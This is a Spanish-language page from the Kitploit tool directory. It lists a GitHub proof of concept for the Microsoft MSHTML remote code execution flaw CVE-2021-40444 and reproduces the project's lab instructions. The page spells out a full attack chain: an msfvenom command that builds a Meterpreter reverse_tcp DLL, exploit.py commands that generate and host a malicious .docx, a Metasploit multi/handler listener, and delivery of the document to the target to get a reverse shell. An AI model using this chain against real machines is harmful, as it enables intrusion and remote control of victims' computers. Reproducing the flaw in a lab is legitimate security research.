Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/kagura-maru/cve-2021-40444-poc
Frameworks de ExploitsGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubkagura-maru/cve-2021-40444-poc

CVE-2021-40444-POC

Un intento de reproducir la vulnerabilidad de ejecución remota de código (RCE) de Microsoft MSHTML utilizando Metasploit Framework.

Ver Repositorio
1013hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-40444-POC

Un intento de reproducir la vulnerabilidad de ejecución remota de código (RCE) de Microsoft MSHTML utilizando Metasploit Framework.

funciona mejor si no se ejecuta en FlareVM

PREPARACIÓN

Clona el repositorio desde https://github.com/lockedbyte/CVE-2021-40444

Prepara la plantilla .dll para ser usada más tarde con msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll

Copia el template.dll recién producido en la carpeta test/ del repositorio Otorga permiso de ejecución al template.dll con chmod +x template.dll

Ejecuta el script para procesar el template.dll en output python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>

ESCUCHADOR

El documento será exportado a la carpeta out/ y podemos crear un escuchador en nuestro puerto HTTP (por defecto es 80) python3 exploit.py host 80

Ejecuta metasploit con msfconsole -q use multi/handler set payload windows/meterpreter/reverse_tcp set lhost <SOURCE IP> run

CARGA

Luego podemos enviar el document.docx a nuestra máquina vulnerable y ejecutar el .docx

Obtendremos respuesta en la terminal de exploit.py y el laboratorio es exitoso si podemos generar una shell reversa de TCP.

Descargar herramienta